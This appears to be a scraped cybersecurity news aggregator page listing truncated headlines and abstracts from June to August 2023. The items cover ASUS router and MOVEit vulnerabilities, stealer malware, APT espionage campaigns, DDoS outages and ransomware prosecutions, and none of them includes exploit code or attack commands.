Taiwanese company ASUS on Monday released firmware updates to address, among other issues, nine security bugs impacting a wide range of router models. Of the nine security flaws, two are rated Critical and six are rated High in severity. One vulnerability is currently awaiting analysis. The list of impacted products are GT6, GT-AXE16000, GT-AX11000 PRO, GT-AXE11000, GT-AX6000, GT-AX11000, GS-AX5400, GS-AX3000, XT9, XT8, XT8 V2, RT-AX86U PRO, RT-AX86U, RT-AX86S, RT-AX82U, RT-AX58U, RT-AX3000, TUF-AX6000, and TUF-AX5400. Topping the list of fixes are CVE-2018-1160 and CVE-2022-26376 , both of which are rated 9.8 out of a maximum of 10 on the CVSS scoring system. CVE-2018-1160 concerns a nearly five-year-old out-of-bounds write bug in Netatalk versions before 3.1.12 that could allow a remote unauthenticated attacker to achieve arbitrary code execution. CVE-2022-26376 has been described as a memory corruption vulnerability in the Asuswrt firmware that could be triggered by meanThe Hacker News
June 20, 2023 – Vulnerabilities
ASUS addressed critical flaws in some router models Full Text
Abstract
ASUS addressed critical vulnerabilities in multiple router models, urging customers to immediately install firmware updates. ASUS is warning customers to update some router models to the latest firmware to address critical vulnerabilities. The...Security Affairs
June 20, 2023 – Government
Federal Authority Warns Health Sector of TimisoaraHackerTeam Threats Full Text
Abstract
Federal authorities are warning the healthcare sector of an apparent resurgence of TimisoaraHackerTeam threats after a recent attack by the "obscure" ransomware group on a U.S. cancer center.Cyware
June 20, 2023 – Breach
Over 100,000 Stolen ChatGPT Account Credentials Sold on Dark Web Marketplaces Full Text
Abstract
Over 101,100 compromised OpenAI ChatGPT account credentials have found their way on illicit dark web marketplaces between June 2022 and May 2023, with India alone accounting for 12,632 stolen credentials. The credentials were discovered within information stealer logs made available for sale on the cybercrime underground, Group-IB said in a report shared with The Hacker News. "The number of available logs containing compromised ChatGPT accounts reached a peak of 26,802 in May 2023," the Singapore-headquartered company said . "The Asia-Pacific region has experienced the highest concentration of ChatGPT credentials being offered for sale over the past year." Other countries with the most number of compromised ChatGPT credentials include Pakistan, Brazil, Vietnam, Egypt, the U.S., France, Morocco, Indonesia, and Bangladesh. A further analysis has revealed that the majority of logs containing ChatGPT accounts have been breached by the notorious Raccoon info stealThe Hacker News
June 20, 2023 – Malware
Rogue Android Apps Target Pakistani Individuals in Sophisticated Espionage Campaign Full Text
Abstract
Individuals in the Pakistan region have been targeted using two rogue Android apps available on the Google Play Store as part of a new targeted campaign. Cybersecurity firm Cyfirma attributed the campaign with moderate confidence to a threat actor known as DoNot Team , which is also tracked as APT-C-35 and Viceroy Tiger. The espionage activity involves duping Android smartphone owners into downloading a program that's used to extract contact and location data from unwitting victims. "The motive behind the attack is to gather information via the stager payload and use the gathered information for the second-stage attack, using malware with more destructive features," the company said . DoNot Team is a suspected India-nexus threat actor that has a reputation for carrying out attacks against various countries in South Asia. It has been active since at least 2016. While an October 2021 report from Amnesty International linked the group's attack infrastructure toThe Hacker News
June 19, 2023 – Outage
Anonymous Sudan and Killnet strike again, target EIB Full Text
Abstract
The EIB‘s main site is currently down, and the bank has just released a Tweet acknowledging the issue as a ‘cyber attack.’ The EIB interconnection infrastructure has been allegedly disrupted.Cyware
June 19, 2023 – Malware
New Mystic Stealer Malware Targets 40 Web Browsers and 70 Browser Extensions Full Text
Abstract
A new information-stealing malware called Mystic Stealer has been found to steal data from about 40 different web browsers and over 70 web browser extensions. First advertised on April 25, 2023, for $150 per month, the malware also targets cryptocurrency wallets, Steam, and Telegram, and employs extensive mechanisms to resist analysis. "The code is heavily obfuscated making use of polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants," InQuest and Zscaler researchers said in an analysis published last week. Mystic Stealer, like many other crimeware solutions that are offered for sale, focuses on pilfering data and is implemented in the C programming language. The control panel has been developed using Python. Updates to the malware in May 2023 incorporate a loader component that allows it to retrieve and execute next-stage payloads fetched from a command-and-control (C2) server, making it a more formidable threat. C2 coThe Hacker News
June 19, 2023 – Malware
Experts found components of a complex toolkit employed in macOS attacks Full Text
Abstract
Researchers uncovered a set of malicious files with backdoor capabilities that they believe is part of a toolkit targeting Apple macOS systems. Bitdefender researchers discovered a set of malicious files with backdoor capabilities that are suspected...Security Affairs
June 19, 2023 – Malware
DcRAT Malware Distributed Using Explicit Lures of OnlyFans Full Text
Abstract
The DcRAT malware is being distributed using explicit lures for OnlyFans pages and other adult content. DcRAT offers multiple methods of monetizing infected systems, file stealing, credential theft, and ransomware.Cyware
June 19, 2023 – Malware
Researchers Discover New Sophisticated Toolkit Targeting Apple macOS Systems Full Text
Abstract
Cybersecurity researchers have uncovered a set of malicious artifacts that they say is part of a sophisticated toolkit targeting Apple macOS systems. "As of now, these samples are still largely undetected and very little information is available about any of them," Bitdefender researchers Andrei Lapusneanu and Bogdan Botezatu said in a preliminary report published on Friday. The Romanian firm's analysis is based on an examination of four samples that were uploaded to VirusTotal by an unnamed victim. The earliest sample dates back to April 18, 2023. Two of the three malicious programs are said to be generic Python-based backdoors that are designed to target Windows, Linux, and macOS systems. The payloads have been collectively dubbed JokerSpy . The first constituent is shared.dat, which, once launched, runs an operating system check (0 for Windows, 1 for macOS, and 2 for Linux) and establishes contact with a remote server to fetch additional instructions for executThe Hacker News
June 19, 2023 – Government
EU member states are urged to restrict without delay 5G equipment from risky suppliers Full Text
Abstract
The European Commission urges member states to limit “without delay” equipment from Chinese suppliers from their 5G networks, specifically Huawei and ZTE. The European Commission told member states to impose restrictions on high-risk suppliers...Security Affairs
June 19, 2023 – Government
– Government
Britain to double cyber defense funding for Ukraine Full Text
Abstract
The United Kingdom on Sunday announced a “major expansion” to its Ukraine Cyber Program, which has seen British experts provide remote incident response support to the Ukrainian government following Russian cyberattacks on critical infrastructure.Cyware
June 19, 2023 – Solution
Introducing AI-guided Remediation for IaC Security / KICS Full Text
Abstract
While the use of Infrastructure as Code (IaC) has gained significant popularity as organizations embrace cloud computing and DevOps practices, the speed and flexibility that IaC provides can also introduce the potential for misconfigurations and security vulnerabilities. IaC allows organizations to define and manage their infrastructure using machine-readable configuration files, which are typically version-controlled and treated as code. IaC misconfigurations are mistakes, or oversights, in the configuration of infrastructure resources and environments that happen when using IaC tools and frameworks. Discover the power of a comprehensive AppSec platform. Download this new whitepaper to discover how to effortlessly integrate application security into every stage of the software development life cycle. Learn about the role of integration and automation, the 7 requirements for choosing an AppSec platform, and how Checkmarx One™ simplifies security. Misconfigurations in IaC caThe Hacker News
June 19, 2023 – Criminals
Diicot cybercrime gang expands its attack capabilities Full Text
Abstract
Researchers found evidence that Diicot threat actors are expanding their capabilities with new payloads and the Cayosin Botnet. Cado researchers recently detected an interesting attack pattern linked to an emerging cybercrime group tracked as Diicot...Security Affairs
June 19, 2023 – Vulnerabilities
Third Bug in MOVEit Transfer Found Full Text
Abstract
Progress Software has reported a third vulnerability in its MOVEit Transfer application. The bug, which still awaits a CVE identifier, is an SQL injection vulnerability. The company strongly advised customers to disable all HTTP and HTTPS traffic to MOVEit Transfer on ports 80 and 443. This precaut ... Read MoreCyware
June 19, 2023 – Hacker
State-Backed Hackers Employ Advanced Methods to Target Middle Eastern and African Governments Full Text
Abstract
Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques. "The main goal of the attacks was to obtain highly confidential and sensitive information, specifically related to politicians, military activities, and ministries of foreign affairs," Lior Rochberger, senior threat researcher at Palo Alto Networks, said in a technical deep dive published last week. The company's Cortex Threat Research team is tracking the activity under the temporary name CL-STA-0043 (where CL stands for cluster and STA stands for state-backed motivation), describing it as a "true advanced persistent threat." The infection chain is triggered by the exploitation of vulnerable on-premises Internet Information Services ( IIS ) and Microsoft Exchange serves to infiltrate target networks. Palo Alto Networks said it deteThe Hacker News
June 19, 2023 – Business
Content Moderation Tech Startup Trust Lab Snags $15M Investment Full Text
Abstract
The Palo Alto company said the $15 million Series A was led by U.S. Venture Partners (USVP) and Foundation Capital, two prominent investment firms betting on cybersecurity startups.Cyware
June 19, 2023 – Denial Of Service
Microsoft Blames Massive DDoS Attack for Azure, Outlook, and OneDrive Disruptions Full Text
Abstract
Microsoft on Friday attributed a string of service outages aimed at Azure, Outlook, and OneDrive earlier this month to an uncategorized cluster it tracks under the name Storm-1359 . "These attacks likely rely on access to multiple virtual private servers (VPS) in conjunction with rented cloud infrastructure, open proxies, and DDoS tools," the tech giant said in a post on Friday. Storm-#### (previously DEV-####) is a temporary designation the Windows maker assigns to unknown, emerging, or developing groups whose identity or affiliation hasn't been definitively established yet. While there is no evidence that any customer data was accessed or compromised, the company noted the attacks "temporarily impacted availability" of some services. Redmond said it further observed the threat actor launching layer 7 DDoS attacks from multiple cloud services and open proxy infrastructures. This includes HTTP(S) flood attacks, which bombard the target services with aThe Hacker News
June 18, 2023 – Outage
Microsoft: June Outlook and cloud platform outages were caused by DDoS Full Text
Abstract
Microsoft confirmed that the recent outages to the Azure, Outlook, and OneDrive services were caused by cyber attacks. In early June, Microsoft suffered severe outages for some of its services, including Outlook email, OneDrive file-sharing apps,...Security Affairs
June 18, 2023 – Criminals
Reddit Files: BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from Reddit Full Text
Abstract
The BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from the Reddit in February cyberattack. In February, the social news aggregation platform Reddit suffered a security breach, attackers gained unauthorized access to internal documents,...Security Affairs
June 18, 2023 – Government
US govt offers $10 million bounty for info linking Clop ransomware gang to a foreign government. Full Text
Abstract
The U.S. government announced up to a $10 million bounty for information linking the Clop ransomware gang to a foreign government. The US goverment is offering up to a $10 million bounty for information linking CL0P Ransomware Gang or any other threat...Security Affairs
June 18, 2023 – General
Security Affairs newsletter Round 424 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Law...Security Affairs
June 17, 2023 – Criminals
Law enforcement shutdown a long-standing DDoS-for-hire service Full Text
Abstract
Polish police, as part of the international law enforcement operation PowerOFF, dismantled a DDoS-for-hire service that has been active since at least 2013. An international operation codenamed PowerOff led to the shutdown of a DDoS-for-hire service...Security Affairs
June 17, 2023 – Vulnerabilities
A simple bug exposed access to thousands of smart security alarm systems Full Text
Abstract
U.S. power and electronics giant Eaton has fixed a security vulnerability that allowed a security researcher to remotely access thousands of smart security alarm systems.Cyware
June 17, 2023 – Botnet
From Cryptojacking to DDoS Attacks: Diicot Expands Tactics with Cayosin Botnet Full Text
Abstract
Cybersecurity researchers have discovered previously undocumented payloads associated with a Romanian threat actor named Diicot , revealing its potential for launching distributed denial-of-service (DDoS) attacks. "The Diicot name is significant, as it's also the name of the Romanian organized crime and anti-terrorism policing unit ," Cado Security said in a technical report. "In addition, artifacts from the group's campaigns contain messaging and imagery related to this organization." Diicot (née Mexals) was first documented by Bitdefender in July 2021, uncovering the actor's use of a Go-based SSH brute-forcer tool called Diicot Brute to breach Linux hosts as part of a cryptojacking campaign. Then earlier this April, Akamai disclosed what it described as a "resurgence" of the 2021 activity that's believed to have started around October 2022, netting the actor about $10,000 in illicit profits. "The attackers use a long chThe Hacker News
June 17, 2023 – Vulnerabilities
Third MOVEit bug fixed a day after PoC exploit made public Full Text
Abstract
Details of the latest vulnerability, tracked as CVE-2023-35708, were made public Thursday; proof-of-concept (PoC) exploit for the flaw, now fixed today, also emerged on Thursday. Progress Software issued a fix for it on Friday.Cyware
June 16, 2023 – Policy and Law
Justice Department Charges Russian National for LockBit Ransomware Attacks Full Text
Abstract
The 20-year old allegedly participated in a conspiracy to commit wire fraud and intentionally damage protected computers and make ransom demands.Lawfare
June 16, 2023 – Criminals
A Russian national charged for committing LockBit Ransomware attacks Full Text
Abstract
DoJ charged a Russian national with conspiring to carry out LockBit ransomware attacks against U.S. and foreign businesses. The Justice Department announced charges against the Russian national Ruslan Magomedovich Astamirov (20) for his role in numerous...Security Affairs
June 16, 2023 – Malware
ChamelDoH: New Linux Backdoor Utilizing DNS-over-HTTPS Tunneling for Covert CnC Full Text
Abstract
The threat actor known as ChamelGang has been observed using a previously undocumented implant to backdoor Linux systems, marking a new expansion of the threat actor's capabilities. The malware, dubbed ChamelDoH by Stairwell, is a C++-based tool for communicating via DNS-over-HTTPS ( DoH ) tunneling. ChamelGang was first outed by Russian cybersecurity firm Positive Technologies in September 2021, detailing its attacks on fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan. Attack chains mounted by the actor have leveraged vulnerabilities in Microsoft Exchange servers and Red Hat JBoss Enterprise Application to gain initial access and carry out data theft attacks using a passive backdoor called DoorMe. "This is a native IIS module that is registered as a filter through which HTTP requests and responses are processed," Positive Technologies said at the time. "Its principle of operation is unusual: the backThe Hacker News
June 16, 2023 – Attack
Oil and gas giant Shell is another victim of Clop ransomware attacks Full Text
Abstract
British multinational oil and gas company Shell has confirmed that it has suffered a ransomware attack conducted by the Clop group. Oil and Gas giant Shell has confirmed that it is one of the victims of the recent large-scale ransomware campaign...Security Affairs
June 16, 2023 – Malware
Balada Injector Campaign Hacks WordPress Sites Using Unpatched Plugins Full Text
Abstract
Balada leverages functions written in the Go language to spread itself and maintain persistence by executing a series of attacks, cross-site infections, and installation of backdoors.Cyware
June 16, 2023 – Education
Activities in the Cybercrime Underground Require a New Approach to Cybersecurity Full Text
Abstract
As Threat Actors Continuously Adapt their TTPs in Today's Threat Landscape, So Must You Earlier this year, threat researchers at Cybersixgill released the annual report, The State of the Cybercrime Underground . The research stems from an analysis of Cybersixgill's collected intelligence items throughout 2022, gathered from the deep, dark and clear web. The report examines the continuous evolution of threat actors' tactics, tools, and procedures (TTPs) in the Digital Age – and how organizations can adapt to reduce risk and maintain business resilience. This article summarizes a few of the report's findings, including trends in credit card fraud, observations about cryptocurrency, AI developments and how they're lowering barriers to entry to cybercrime, and the rise of cybercriminal "as-a-service" activities. Further below, I also discuss the need for a new security approach, combining attack surface management (ASM) and cyber threat intelligence (CTI) toThe Hacker News
June 16, 2023 – Vulnerabilities
Progress fixed a third flaw in MOVEit Transfer software Full Text
Abstract
Progress Software addressed a third vulnerability impacting its MOVEit Transfer application that could lead to privilege escalation and information disclosure. Progress Software disclosed a new SQL injection vulnerability impacting its MOVEit Transfer...Security Affairs
June 16, 2023 – Breach
Two Energy Department Entities Breached as Part of Massive MOVEit Transfer Compromise Full Text
Abstract
Multiple federal agencies, including two Department of Energy entities, were victims of a cyberattack that resulted from a widespread vulnerability in MOVEit file transfer software, federal officials said Thursday.Cyware
June 16, 2023 – Criminals
20-Year-Old Russian LockBit Ransomware Affiliate Arrested in Arizona Full Text
Abstract
The U.S. Department of Justice (DoJ) on Thursday unveiled charges against a Russian national for his alleged involvement in deploying LockBit ransomware to targets in the U.S., Asia, Europe, and Africa. Ruslan Magomedovich Astamirov, 20, of Chechen Republic has been accused of perpetrating at least five attacks between August 2020 and March 2023. He was arrested in the state of Arizona last month. "Astamirov allegedly participated in a conspiracy with other members of the LockBit ransomware campaign to commit wire fraud and to intentionally damage protected computers and make ransom demands through the use and deployment of ransomware," the DoJ said . Astamirov, as part of his LockBit-related activities, managed various email addresses, IP addresses, and other online accounts to deploy the ransomware and communicate with the victims. Law enforcement agencies said they were able to trace a chunk of an unnamed victim's ransom payment to a virtual currency address operated by AstamThe Hacker News
June 16, 2023 – Malware
Updated Android spyware GravityRAT steals WhatsApp Backups Full Text
Abstract
An updated version of the Android remote access trojan GravityRAT can steal WhatsApp backup files and can delete files ESET researchers discovered an updated version of Android GravityRAT spyware that steals WhatsApp backup files and can delete files....Security Affairs
June 16, 2023 – Hacker
New Diicot Threat Group Targets SSH Servers with Brute-Force Malware Full Text
Abstract
Deploying Cayosin botnet, an off-the-shelf Mirai-based botnet agent to target routers running the Linux-based OS OpenWRT is a newly adopted tactic, indicating that the group changes its attack style after examining its targets.Cyware
June 16, 2023 – Vulnerabilities
Third Flaw Uncovered in MOVEit Transfer App Amidst Cl0p Ransomware Mass Attack Full Text
Abstract
Progress Software on Thursday disclosed a third vulnerability impacting its MOVEit Transfer application, as the Cl0p cybercrime gang deployed extortion tactics against affected companies. The new flaw , which is being tracked as CVE-2023-35708 , also concerns an SQL injection vulnerability that "could lead to escalated privileges and potential unauthorized access to the environment." The company is urging its customers to disable all HTTP and HTTPs traffic to MOVEit Transfer on ports 80 and 443 to safeguard their environments while a fix is being prepared to address the weakness. The cloud managed file transfer solution has been fully patched. The revelation comes a week after Progress divulged another set of SQL injection vulnerabilities ( CVE-2023-35036 ) that it said could be weaponized to access the application's database content. The vulnerabilities join CVE-2023-34362 , which was exploited as a zero-day by the Clop ransomware gang in data theft attacksThe Hacker News
More
August 31, 2023
APT Attacks From ‘Earth Estries’ Hit Governments, Tech Firms Across the Globe Full Text
Abstract
Earth Estries uses advanced techniques such as DLL sideloading and has developed three custom malware tools: Zingdoor, TrillClient, and HemiGate. It has been active since at least 2020 and has similarities with another group called FamousSparrow.Cyware
August 25, 2023
China-linked Flax Typhoon APT targets Taiwan Full Text
Abstract
China-linked APT group Flax Typhoon targeted dozens of organizations in Taiwan as part of a suspected espionage campaign. Microsoft linked the Chinese APT Flax Typhoon (aka Ethereal Panda) to a cyber espionage campaign that targeted dozens of organizations...Security Affairs
August 24, 2023
nao-sec.org Full Text
Abstract
The APT group starts by sending a spear-phishing email, which consists of a DOC file embedded with a URL for a ZIP file download. Once the ZIP file gets downloaded, it contains an EXE file and a DLL file which are executed to infect malware.Cyware
August 23, 2023
Carderbee APT targets Hong Kong orgs via supply chain attacks Full Text
Abstract
A previously unknown APT group, tracked as Carderbee, was behind a supply chain attack against Hong Kong organizations. Symantec Threat Hunter Team reported that a previously unknown APT group, tracked as Carderbee, used a malware-laced version of the legitimate...Security Affairs
August 23, 2023
Supply Chain Attack: Carderbee APT Strikes Hong Kong Organizations Full Text
Abstract
Undocumented threat cluster Carderbee was observed targeting organizations in Hong Kong and other Asian regions via a trojanized version of the legitimate software EsafeNet Cobra DocGuard Client to deliver the PlugX backdoor and gain access to victim networks. Strengthening supply chain security th ... Read MoreCyware
August 22, 2023
Carderbee APT Uses Legitimate Software in Supply Chain Attack Targeting Hong Kong Firms Full Text
Abstract
The group appears to be skilled and patient, selectively pushing payloads to specific victims. The use of signed malware and supply chain attacks makes it difficult for security software to detect.Cyware
August 20, 2023
N. Korean Kimsuky APT targets S. Korea-US military exercises Full Text
Abstract
North Korea-linked APT Kimsuky launched a spear-phishing campaign targeting US contractors working at the war simulation centre. North Korea-linked APT group Kimsuky carried out a spear-phishing campaign against US contractors involved in a joint...Security Affairs
August 18, 2023
Bronze Starlight targets the Southeast Asian gambling sector Full Text
Abstract
Experts warn of an ongoing campaign attributed to China-linked Bronze Starlight that is targeting the Southeast Asian gambling sector. SentinelOne observed China-linked APT group Bronze Starlight (aka APT10, Emperor Dragonfly or Storm-0401) targeting...Security Affairs
August 17, 2023
APT29 is targeting Ministries of Foreign Affairs of NATO-aligned countries Full Text
Abstract
Russia-linked APT29 used the Zulip Chat App in attacks aimed at ministries of foreign affairs of NATO-aligned countries EclecticIQ researchers uncovered an ongoing spear-phishing campaign conducted by Russia-linked threat actors targeting Ministries...Security Affairs
August 11, 2023
Researchers Shed Light on APT31’s Advanced Backdoors and Data Exfiltration Tactics Full Text
Abstract
The Chinese threat actor known as APT31 (aka Bronze Vinewood, Judgement Panda, or Violet Typhoon) has been linked to a set of advanced backdoors that are capable of exfiltrating harvested sensitive information to Dropbox. The malware is part of a broader collection of more than 15 implants that have been put to use by the adversary in attacks targeting industrial organizations in Eastern Europe in 2022. "The attackers aimed to establish a permanent channel for data exfiltration, including data stored on air-gapped systems," Kaspersky said in an analysis spotlighting APT31's previously undocumented tradecraft. The intrusions employ a three-stage malware stack, each focused on disparate aspects of the attack chain: setting up persistence, gathering sensitive data, and transmitting the information to a remote server under the threat actor's control. Some variants of the second-stage backdoors also come with features designed to look up file names in the MicrosoThe Hacker News
August 11, 2023
Charming Kitten APT is targeting Iranian dissidents in Germany Full Text
Abstract
Germany’s Federal Office for the Protection of the Constitution (BfV) warns that the Charming Kitten APT group targeted Iranian dissidents in the country. The Federal Office for the Protection of the Constitution (BfV) is warning that an alleged...Security Affairs
August 6, 2023
BlueCharlie changes attack infrastructure in response to reports on its activity Full Text
Abstract
Russia-linked APT group BlueCharlie was observed changing its infrastructure in response to recent reports on its activity. Researchers from Recorded Future reported that Russia-linked APT group BlueCharlie (aka Blue Callisto, Callisto, COLDRIVER,...Security Affairs
August 3, 2023
Russian APT29 conducts phishing attacks through Microsoft Teams Full Text
Abstract
Russia-linked APT29 group targeted dozens of organizations and government agencies worldwide with Microsoft Teams phishing attacks. Microsoft Threat Intelligence reported that Russia-linked cyberespionage group APT29 (aka SVR group, Cozy Bear, Nobelium,...Security Affairs
August 02, 2023
Norwegian Entities Targeted in Ongoing Attacks Exploiting Ivanti EPMM Vulnerability Full Text
Abstract
Advanced persistent threat (APT) actors exploited a recently disclosed critical flaw impacting Ivanti Endpoint Manager Mobile (EPMM) as a zero-day since at least April 2023 in attacks directed against Norwegian entities, including a government network. The disclosure comes as part of a new joint advisory released by the Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) Tuesday. The exact identity or origin of the threat actor remains unclear. "The APT actors have exploited CVE-2023-35078 since at least April 2023," the authorities said . "The actors leveraged compromised small office/home office (SOHO) routers, including ASUS routers, to proxy to target infrastructure.' CVE-2023-35078 refers to a severe flaw that allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. It can be chained with a second vulneThe Hacker News
August 01, 2023
China’s APT31 Suspected in Attacks on Air-Gapped Systems in Eastern Europe Full Text
Abstract
A nation-state actor with links to China is suspected of being behind a series of attacks against industrial organizations in Eastern Europe that took place last year to siphon data stored on air-gapped systems. Cybersecurity company Kaspersky attributed the intrusions with medium to high confidence to a hacking crew called APT31 , which is also tracked under the monikers Bronze Vinewood, Judgement Panda, and Violet Typhoon (formerly Zirconium), citing commonalities in the tactics observed. The attacks entailed the use of more than 15 distinct implants and their variants, broken down into three broad categories based on their ability to establish persistent remote access, gather sensitive information, and transmit the collected data to actor-controlled infrastructure. "One of the implant types appeared to be a sophisticated modular malware, aimed at profiling removable drives and contaminating them with a worm to exfiltrate data from isolated, or air-gapped, networks of indusThe Hacker News
July 28, 2023
Russian APT BlueBravo targets diplomatic entities with GraphicalProton backdoor Full Text
Abstract
Russia-linked BlueBravo has been spotted targeting diplomatic entities in Eastern Europe with the GraphicalProton Backdoor. The Russia-linked threat-state actor BlueBravo (aka APT29, Cloaked Ursa, and Midnight Blizzard, Nobelium) has been observed...Security Affairs
July 25, 2023
North Korean Nation-State Actors Exposed in JumpCloud Hack After OPSEC Blunder Full Text
Abstract
North Korean nation-state actors affiliated with the Reconnaissance General Bureau (RGB) have been attributed to the JumpCloud hack following an operational security (OPSEC) blunder that exposed their actual IP address. Google-owned threat intelligence firm Mandiant attributed the activity to a threat actor it tracks under the name UNC4899, which likely shares overlaps with clusters already being monitored as Jade Sleet and TraderTraitor, a group with a history of striking blockchain and cryptocurrency sectors. UNC4899 also overlaps with APT43 , another hacking crew associated with the Democratic People's Republic of Korea (DPRK) that was unmasked earlier this March as conducting a series of campaigns to gather intelligence and siphon cryptocurrency from targeted companies. The adversarial collective's modus operandi is characterized by the use of Operational Relay Boxes ( ORBs ) using L2TP IPsec tunnels along with commercial VPN providers to disguise the attacker'sThe Hacker News
July 25, 2023
Chinese Cyberespionage Group APT31 Targets Eastern European Entities Full Text
Abstract
A China-linked group APT31 (aka Zirconium) has been linked to a cyberespionage campaign targeting industrial organizations in Eastern Europe. The attackers abused DLL hijacking vulnerabilities in cloud-based data storage systems such as Dropbox or Yandex, as well as a temporary file-sharing serv ... Read MoreCyware
July 24, 2023
Lazarus Targets Windows IIS Web Servers for Malware Distribution Full Text
Abstract
ASEC discovered that the North Korean state-sponsored Lazarus APT group is attacking Windows Internet Information Service (IIS) web servers and using them to distribute malware. It is imperative for organizations to adopt stringent measures, including attack surface management, to identify expo ... Read MoreCyware
July 20, 2023
Experts attribute WyrmSpy and DragonEgg spyware to the Chinese APT41 group Full Text
Abstract
China-linked group APT41 was spotted using two previously undocumented Android spyware called WyrmSpy and DragonEgg China-linked APT group APT41 has been observed using two previously undocumented Android spyware called WyrmSpy and DragonEgg. The...Security Affairs
July 19, 2023
Chinese APT41 Hackers Target Mobile Devices with New WyrmSpy and DragonEgg Spyware Full Text
Abstract
The prolific China-linked nation-state actor known as APT41 has been linked to two previously undocumented strains of Android spyware called WyrmSpy and DragonEgg. "Known for its exploitation of web-facing applications and infiltration of traditional endpoint devices, an established threat actor like APT 41 including mobile in its arsenal of malware shows how mobile endpoints are high-value targets with coveted corporate and personal data," Lookout said in a report shared with The Hacker News. APT41, also tracked under the names Axiom, Blackfly, Brass Typhoon (formerly Barium), Bronze Atlas, HOODOO, Wicked Panda, and Winnti, is known to be operational since at least 2007, targeting a wide range of industries to conduct intellectual property theft. Recent attacks mounted by the adversarial collective have leveraged an open-source red teaming tool known as Google Command and Control (GC2) as part of attacks aimed at media and job platforms in Taiwan and Italy. The initThe Hacker News
July 18, 2023
Gamaredon APT Steals Data Within an Hour Full Text
Abstract
Once again, the Gamaredon APT is carrying out a new wave of phishing attacks targeting Ukrainian government agencies, stealing data within an hour of the attack. The campaign is aimed at entities in Ukraine, including security services, military, and government organizations. It is advised tha ... Read MoreCyware
July 15, 2023
Russia-linked APT Gamaredon starts stealing data from victims between 30 and 50 minutes after the initial compromise Full Text
Abstract
Ukraine's Computer Emergency Response Team (CERT-UA) states that Russia-linked APT Gamaredon starts stealing data 30 minutes after the initial compromise. Ukraine's Computer Emergency Response Team (CERT-UA) is warning that the Russia-linked APT group...Security Affairs
July 09, 2023
Charming Kitten hackers use new ‘NokNok’ malware for macOS Full Text
Abstract
Security researchers observed a new campaign they attribute to the Charming Kitten APT group where hackers used new NokNok malware that targets macOS systems.BleepingComputer
July 8, 2023
Iran-linked APT TA453 targets Windows and macOS systems Full Text
Abstract
Iran-linked APT group tracked TA453 has been linked to a new malware campaign targeting both Windows and macOS systems. The Iran-linked threat actor TA453 has been linked to a malware campaign that targets both Windows and macOS. TA453 is a nation-state...Security Affairs
July 3, 2023
SmugX: Chinese APT uses HTML smuggling to target European Ministries and embassies Full Text
Abstract
China-linked APT group was spotted using HTML smuggling in attacks aimed at Foreign Affairs ministries and embassies in Europe. A China-linked APT group was observed using HTML smuggling in attacks against Foreign Affairs ministries and embassies...Security Affairs
June 30, 2023
Iran-linked Charming Kitten APT enhanced its POWERSTAR Backdoor Full Text
Abstract
Iran-linked Charming Kitten group used an updated version of the PowerShell backdoor called POWERSTAR in a spear-phishing campaign. Security firm Volexity observed the Iran-linked Charming Kitten (aka APT35, Phosphorus, Newscaster, and Ajax Security Team)...Security Affairs
June 30, 2023
North Korea-linked Andariel APT used a new malware named EarlyRat last year Full Text
Abstract
North Korea-linked cyberespionage group Andariel used a previously undocumented malware called EarlyRat. Kaspersky researchers reported that the North Korea-linked APT group Andariel used a previously undocumented malware dubbed EarlyRat in...Security Affairs
June 26, 2023
China-linked APT group VANGUARD PANDA uses a new tradecraft in recent attacks Full Text
Abstract
China-linked APT group VANGUARD PANDA, aka Volt Typhoon, was spotted observing a novel tradecraft to gain initial access to target networks. CrowdStrike researchers observed the China-linked APT group VANGUARD PANDA, aka Volt Typhoon, using a novel...Security Affairs
June 21, 2023
Russia-linked APT28 hacked Roundcube email servers of Ukrainian entities Full Text
Abstract
Russia-linked APT28 group hacked into Roundcube email servers belonging to multiple Ukrainian organizations. A joint investigation conducted by Ukraine's Computer Emergency Response Team (CERT-UA) and Recorded Future revealed that the Russia-linked...Security Affairs
June 15, 2023
Chinese UNC4841 Group Exploits Zero-Day Flaw in Barracuda Email Security Gateway Full Text
Abstract
A suspected China-nexus threat actor dubbed UNC4841 has been linked to the exploitation of a recently patched zero-day flaw in Barracuda Email Security Gateway (ESG) appliances since October 2022. "UNC4841 is an espionage actor behind this wide-ranging campaign in support of the People's Republic of China," Google-owned Mandiant said in a new report published today, describing the group as "aggressive and skilled." The flaw in question is CVE-2023-2868 (CVSS score: 9.8), which relates to a remote code injection affecting versions 5.1.3.001 through 9.2.0.006 that arises as a result of an incomplete validation of attachments contained within incoming emails. Barracuda addressed the problem on May 20 and 21, 2023, but the company has since urged affected customers to immediately replace the devices "regardless of patch version level." Now according to the incident response and threat intelligence firm, which was appointed to probe the hack, UNC4The Hacker News
June 15, 2023
Russia-linked APT Gamaredon update TTPs in recent attacks against Ukraine Full Text
Abstract
Russia-linked APT group Gamaredon is using a new toolset in attacks aimed at critical organizations in Ukraine. The Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, UAC-0010, and Trident Ursa)...Security Affairs
June 14, 2023
Microsoft links Cadet Blizzard APT to Russia’s military intelligence GRU Full Text
Abstract
Microsoft linked a series of wiping attacks to a Russia-linked APT group, tracked as Cadet Blizzard, that is under the control of the GRU. Microsoft attributes the operations carried out by the Russia-linked APT group tracked as Cadet Blizzard to the Russian...Security Affairs
June 14, 2023
China-linked APT UNC3886 used VMware ESXi Zero-Day Full Text
Abstract
A China-linked APT group tracked as UNC3886 has been spotted exploiting a VMware ESXi zero-day vulnerability. Mandiant researchers observed a China-linked cyberespionage group, tracked as UNC3886, exploiting a VMware ESXi zero-day vulnerability tracked...Security Affairs
June 8, 2023
Experts detail a new Kimsuky social engineering campaign Full Text
Abstract
North Korea-linked APT Kimsuky has been linked to a social engineering campaign aimed at experts in North Korean affairs. SentinelLabs researchers uncovered a social engineering campaign by the North Korea-linked APT group Kimsuky that is targeting...Security Affairs
June 3, 2023
Kimsuky APT poses as journalists and broadcast writers in its attacks Full Text
